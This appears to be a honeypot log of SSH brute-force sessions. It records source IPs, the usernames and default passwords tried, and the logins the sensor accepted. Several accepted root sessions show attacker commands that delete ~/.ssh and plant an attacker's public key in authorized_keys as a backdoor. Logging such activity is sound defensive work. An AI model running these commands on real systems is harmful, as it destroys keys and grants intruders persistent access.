Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support
{
"id": "c9c24b845f6c",
"src_ip": "87.251.64.176",
"start_time": "2026-05-15T13:47:22.608942Z",
"end_time": "2026-05-15T13:47:24.421126Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [
{
"user": "support",
"pass": "support"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: admin
{
"id": "88fd85be807c",
"src_ip": "118.194.235.105",
"start_time": "2026-05-15T13:46:39.779264Z",
"end_time": "2026-05-15T13:46:42.551843Z",
"duration": "2.8",
"version": "SSH-2.0-libssh2_1.11.1",
"hassh": "19532158b559096b89b1a5f7d17175b2",
"attempts": [
{
"user": "admin",
"pass": "admin"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support
{
"id": "79db3f20be13",
"src_ip": "87.251.64.176",
"start_time": "2026-05-15T13:44:08.549587Z",
"end_time": "2026-05-15T13:44:10.362815Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [
{
"user": "support",
"pass": "support"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "a3c7dbe265b2",
"src_ip": "192.252.216.83",
"start_time": "2026-05-15T13:42:19.754332Z",
"end_time": "2026-05-15T13:44:19.768804Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support
{
"id": "22be0ab1aecf",
"src_ip": "87.251.64.176",
"start_time": "2026-05-15T13:41:12.030779Z",
"end_time": "2026-05-15T13:41:13.845841Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [
{
"user": "support",
"pass": "support"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: support
{
"id": "0558750ea061",
"src_ip": "87.251.64.176",
"start_time": "2026-05-15T13:36:53.665493Z",
"end_time": "2026-05-15T13:36:55.482656Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [
{
"user": "support",
"pass": "support"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: user
{
"id": "69bca4219648",
"src_ip": "14.97.77.182",
"start_time": "2026-05-15T13:27:55.738242Z",
"end_time": "2026-05-15T13:28:01.698923Z",
"duration": "6.0",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [
{
"user": "user",
"pass": "111"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: solana
{
"id": "b3d7920ec26d",
"src_ip": "80.94.92.168",
"start_time": "2026-05-15T13:26:33.006202Z",
"end_time": "2026-05-15T13:26:35.700048Z",
"duration": "2.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "solana",
"pass": "solana"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Abc12345
{
"id": "1264492505e0",
"src_ip": "122.160.187.31",
"start_time": "2026-05-15T13:24:37.128995Z",
"end_time": "2026-05-15T13:24:44.677078Z",
"duration": "7.5",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Abc12345"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "3beac9957c52",
"src_ip": "80.94.92.168",
"start_time": "2026-05-15T13:22:02.751922Z",
"end_time": "2026-05-15T13:22:02.934932Z",
"duration": "0.2",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / p@ssw0rd
{
"id": "7b6ae8e35489",
"src_ip": "179.181.133.153",
"start_time": "2026-05-15T13:20:48.147507Z",
"end_time": "2026-05-15T13:20:55.821554Z",
"duration": "7.7",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "p@ssw0rd"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / p@ssw0rd
{
"id": "33a3c152be50",
"src_ip": "82.102.158.36",
"start_time": "2026-05-15T13:20:39.998034Z",
"end_time": "2026-05-15T13:20:47.598412Z",
"duration": "7.6",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "p@ssw0rd"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: user
{
"id": "16031f3a3e09",
"src_ip": "2.57.121.25",
"start_time": "2026-05-15T13:19:02.162049Z",
"end_time": "2026-05-15T13:19:08.928901Z",
"duration": "6.8",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "user",
"pass": "epson"
},
{
"user": "user",
"pass": "endless"
},
{
"user": "user",
"pass": "emili"
},
{
"user": "user",
"pass": "elgato"
},
{
"user": "user",
"pass": "elbereth"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: admin
{
"id": "d2e65080cd0c",
"src_ip": "2.57.121.112",
"start_time": "2026-05-15T13:17:37.538326Z",
"end_time": "2026-05-15T13:17:44.305990Z",
"duration": "6.8",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "admin",
"pass": "denisov"
},
{
"user": "admin",
"pass": "demand"
},
{
"user": "admin",
"pass": "deltaone"
},
{
"user": "admin",
"pass": "delta4"
},
{
"user": "admin",
"pass": "delta2"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: stacie
{
"id": "db7a884a6c66",
"src_ip": "213.209.159.56",
"start_time": "2026-05-15T13:12:43.537236Z",
"end_time": "2026-05-15T13:12:50.132332Z",
"duration": "6.6",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "stacie",
"pass": "stacie"
},
{
"user": "stacie",
"pass": "stacie1"
},
{
"user": "stacie",
"pass": "stacie123"
},
{
"user": "stacie",
"pass": "stacie1234"
},
{
"user": "stacie",
"pass": "stacie12345"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "49bc349ec5b2",
"src_ip": "192.252.216.83",
"start_time": "2026-05-15T13:07:54.077989Z",
"end_time": "2026-05-15T13:09:54.182474Z",
"duration": "120.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "5e0cab90a5ac",
"src_ip": "45.148.10.141",
"start_time": "2026-05-15T13:02:19.358068Z",
"end_time": "2026-05-15T13:02:20.110929Z",
"duration": "0.8",
"version": "SSH-2.0-PUTTY",
"hassh": "5bd26477da5440a6187bd3f1b39a429c",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "bd649f052c1a",
"src_ip": "49.124.152.250",
"start_time": "2026-05-15T12:56:26.649480Z",
"end_time": "2026-05-15T12:56:26.928645Z",
"duration": "0.3",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / Changeme123
{
"id": "50b0325a91f2",
"src_ip": "183.171.43.35",
"start_time": "2026-05-15T12:55:02.632779Z",
"end_time": "2026-05-15T12:55:15.609833Z",
"duration": "13.0",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Changeme123"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "07bc5d3fdeb5",
"src_ip": "183.171.208.174",
"start_time": "2026-05-15T12:55:01.431230Z",
"end_time": "2026-05-15T12:55:02.904612Z",
"duration": "1.5",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: unknown
{
"id": "916cb799018e",
"src_ip": "219.129.96.2",
"start_time": "2026-05-15T12:50:52.774344Z",
"end_time": "2026-05-15T12:50:58.356224Z",
"duration": "5.6",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [
{
"user": "unknown",
"pass": "qwerty1"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "1fedf09d9e10",
"src_ip": "103.203.57.2",
"start_time": "2026-05-15T12:47:03.240000Z",
"end_time": "2026-05-15T12:47:13.239144Z",
"duration": "10.0",
"version": "SSH-2.0-Go",
"hassh": "084386fa7ae5039bcf6f07298a05a227",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "899ed1dc2a59",
"src_ip": "209.99.191.19",
"start_time": "2026-05-15T12:43:21.308022Z",
"end_time": "2026-05-15T12:43:22.334990Z",
"duration": "1.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "267fb48cf3e0",
"src_ip": "209.99.191.19",
"start_time": "2026-05-15T12:43:19.123480Z",
"end_time": "2026-05-15T12:43:21.147114Z",
"duration": "2.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / @dm1n1str@t0r
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "b41f59150052",
"src_ip": "209.99.191.19",
"start_time": "2026-05-15T12:43:16.995613Z",
"end_time": "2026-05-15T12:43:22.331243Z",
"duration": "5.3",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "@dm1n1str@t0r"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: vps
{
"id": "989b7d09da9f",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:34:07.873254Z",
"end_time": "2026-05-15T12:34:09.941244Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "vps",
"pass": "vps@123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ccorrea
{
"id": "f5c0d66bf927",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:32:43.459749Z",
"end_time": "2026-05-15T12:32:45.534548Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "ccorrea",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: vpn
{
"id": "cea91c0bd10c",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:31:21.239379Z",
"end_time": "2026-05-15T12:31:23.311689Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "vpn",
"pass": "1qaz2wsx"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "2b267ac17206",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:30:00.190237Z",
"end_time": "2026-05-15T12:30:01.258517Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "207eaf260f56",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:29:57.952672Z",
"end_time": "2026-05-15T12:30:00.022025Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 55
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "f3616983d188",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:29:55.727221Z",
"end_time": "2026-05-15T12:30:01.255498Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "55"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: xhl2g06n
{
"id": "004788274d5a",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:28:28.539854Z",
"end_time": "2026-05-15T12:28:30.613454Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "xhl2g06n",
"pass": "rDsmrHIgoab9w+EfuqeP"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: router
{
"id": "7088929a0143",
"src_ip": "220.92.179.226",
"start_time": "2026-05-15T12:28:09.254815Z",
"end_time": "2026-05-15T12:28:14.890526Z",
"duration": "5.6",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [
{
"user": "router",
"pass": "adminpwla"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: brengoziscute
{
"id": "4da322bef72f",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:27:01.930582Z",
"end_time": "2026-05-15T12:27:04.000496Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "brengoziscute",
"pass": "0day.today"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: debian
{
"id": "22138e2df856",
"src_ip": "60.251.229.144",
"start_time": "2026-05-15T12:25:38.029283Z",
"end_time": "2026-05-15T12:25:43.068367Z",
"duration": "5.0",
"version": "SSH-2.0-OpenSSH_7.4",
"hassh": "acaa53e0a7d7ac7d1255103f37901306",
"attempts": [
{
"user": "debian",
"pass": "debian88"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "798d26580b69",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:25:37.282474Z",
"end_time": "2026-05-15T12:25:38.353336Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "e2a567630363",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:25:35.045447Z",
"end_time": "2026-05-15T12:25:37.113386Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Tencent@2023
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "798669e85a2c",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:25:32.821120Z",
"end_time": "2026-05-15T12:25:38.350508Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Tencent@2023"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "1567b568f195",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:24:07.076371Z",
"end_time": "2026-05-15T12:24:08.146660Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "de2f7a900538",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:24:04.837555Z",
"end_time": "2026-05-15T12:24:06.908124Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / linux123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "a8d68d6adcdf",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:24:02.604930Z",
"end_time": "2026-05-15T12:24:08.143764Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "linux123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
